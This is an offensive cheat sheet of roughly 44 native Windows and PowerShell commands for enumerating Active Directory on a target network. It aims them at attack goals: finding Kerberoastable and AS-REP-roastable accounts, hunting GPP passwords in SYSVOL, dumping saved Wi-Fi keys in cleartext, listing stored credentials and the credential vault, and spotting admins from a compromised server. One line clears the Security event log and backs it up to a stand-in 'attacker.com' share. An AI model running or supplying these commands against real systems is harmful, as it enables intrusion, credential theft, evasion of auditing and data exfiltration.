Living-Off-the-Land Binaries (LOLBins) for AD enumeration

Work-in-progress

Goal: Enumerate Domain Users, Groups, Computers, Trusts, Sessions, Permissions, Kerberos tickets, etc., using only built-in Windows binaries.

All commands are 100% native (no third-party tools, no PowerView, no BloodHound required). All commands tested on Windows 10/11 & Server 2019/2022/2025

Quickly confirms domain membership and basic OS info

# 1. systeminfo
systeminfo | findstr /B /C:"Domain"

# 2. whoami /all
# Displays current user, SIDs, privileges, and all group memberships (including nested)
whoami /all

# 3. echo %logonserver%
# Shows the Domain Controller you authenticated to during logon
echo %logonserver%

# 4. nltest /dclist:domain.local
# Lists every Domain Controller in the current domain (best native DC discovery)
nltest /dclist:corp.local

# 5. nltest /domain_trusts
# Enumerates all domain and forest trusts (critical for lateral movement paths)
nltest /domain_trusts

# 6. net accounts /domain
# Shows domain password policy and lockout settings
net accounts /domain

# 7. net user /domain
# Lists every domain user account
net user /domain

# 8. net user administrator /domain
# Gets detailed info on any domain user (last logon, description, etc.)
net user administrator /domain

# 9. net group /domain
# Lists all domain security groups
net group /domain

# 10. net group "Domain Admins" /domain
# Shows members of any privileged domain group
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

# 11. net localgroup administrators
# Shows local administrators on current host (often contains domain accounts)
net localgroup administrators

# 12. klist
# Displays current Kerberos tickets (TGT + TGS) – great for spotting high-value tickets
klist

# 13. setspn -Q */*
# Queries all Service Principal Names (SPNs) – foundation for Kerberoasting
setspn -Q */*

# 14. findstr /S /I cpassword \\domain.local\sysvol\domain.local\Policies\*.xml
# Hunts for encrypted Group Policy Preference passwords (still works in 2025!)
findstr /S /I cpassword \\corp.local\sysvol\corp.local\Policies\*.xml

# 15. gpresult /h C:\temp\gpresult.html
# Exports applied Group Policy Objects (check for weak settings or scripts)
gpresult /h C:\temp\gpresult.html

# 16. qwinsta /server:dc01
# Lists logged-on users and RDP sessions on a remote host
qwinsta /server:dc01.corp.local

# 17. dnscmd . /EnumRecords @ .
# Dumps entire DNS zone (requires DNSAdmin or higher)
dnscmd dc01.corp.local /EnumRecords corp.local @ /continue

PowerShell One-Liners (Native ADSI – no RSAT needed)

# 18. Get current domain + forest info (no modules required)
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# 19. Find users with adminCount=1 (highly privileged, often protected by AdminSDHolder)
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(&(objectClass=user)(adminCount=1))"
$searcher.FindAll() | %{$_.Properties}

# 20. Find ASREPRoastable accounts (pre-auth not required)
Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties UserAccountControl

# 21. Unconstrained delegation computers
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# 22. wmic /node:TARGET qfe list
# Confirm patching level & hotfixes on remote systems (helps identify unpatched DCs)
wmic /node:dc01.corp.local qfe list | findstr /i "KB2267602 KB4535680"

# 23. wmic computersystem get name,domain,username
# Quick check: current logged-on user + domain on local or remote host
wmic /node:fileserver01 computersystem get name,domain,username

# 24. net view /domain:corp.local
# Lists all discoverable Windows hosts in the domain (SMB broadcast discovery)
net view /domain:corp.local

# 25. net session
# On a compromised server: shows who has active SMB sessions to it (great for hunting admins)
net session

# 26. net share
# Lists shares on current host – look for ADMIN$, C$, IPC$, SYSVOL, NETLOGON
net share

# 27. dir \\corp.local\SYSVOL /s | findstr /i password
# Alternative GPP cpassword hunt without findstr recursion limits
dir \\corp.local\SYSVOL /s 2>nul | findstr /i password.xml

# 28. powershell -ep bypass -c "Get-ChildItem Env: | ft Name,Value"
# Dump environment variables (sometimes contains credentials or useful paths)
powershell -ep bypass -c "Get-ChildItem Env: | ft Name,Value"

# 29. reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
# Check if Script Block Logging is enabled (helps assess detection risk)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

# 30. wevtutil el | findstr /i security
# List all event logs – useful to see if auditing is enabled
wevtutil el | findstr /i security

# 31. wevtutil cl Security /bu:C:\temp\security.evtx
# Backup (exfil) Security event log if you have admin rights
wevtutil cl Security /bu:\\attacker.com\share\security.evtx

# 32. tasklist /v /fo csv | findstr /i "cmd powershell conhost"
# Spot suspicious processes (e.g., admin running cmd as SYSTEM)
tasklist /v | findstr /i "administrator.*cmd.exe"

# 33. sc query type= service state= all | findstr /i "rpcss lanman"
# Enumerate running services – look for unusual ones (e.g., custom services)
sc queryex type= service state= all | findstr /i DISPLAY_NAME

# 34. driverquery /si
# List signed/unsigned drivers – hunt for vulnerable or fake drivers
driverquery /si | findstr False

# 35. fsutil fsinfo drives
# List all mapped drives (sometimes credentials cached)
fsutil fsinfo drives

# 36. netsh wlan show profiles
# If on a laptop: dump saved Wi-Fi passwords (cleartext with key=clear)
netsh wlan show profiles
netsh wlan show profile name="CorpWiFi" key=clear

# 37. certutil -store my
# List personal certificates (sometimes private keys or useful certs)
certutil -store my

# 38. cmdkey /list
# List saved credentials (RDP, network shares, etc.)
cmdkey /list

# 39. vaultcmd /listcreds
# Windows Credential Vault enumeration (Web Credentials, Windows Credentials)
vaultcmd /listcreds

Advanced PowerShell ADSI (No RSAT/AD Module Required)

# 40. Find all computers with unconstrained delegation
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))"
$searcher.FindAll() | % { $_.Properties.name }

# 41. Find all users with "Do not require Kerberos preauthentication" (ASREPRoastable)
$searcher.Filter = "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
$searcher.FindAll() | % { $_.Properties.samaccountname }

# 42. Find accounts with SPN set (Kerberoastable)
$searcher.Filter = "(&(objectClass=user)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
$searcher.FindAll() | % { $_.Properties.samaccountname + " -> " + $_.Properties.serviceprincipalname }

# 43. Dump all GPOs (names and paths) – no RSAT needed
(Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Group Policy\State\*').PSChildName

# 44. Quick LDAP query for sensitive groups
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$domain.GetAllTrustRelationships()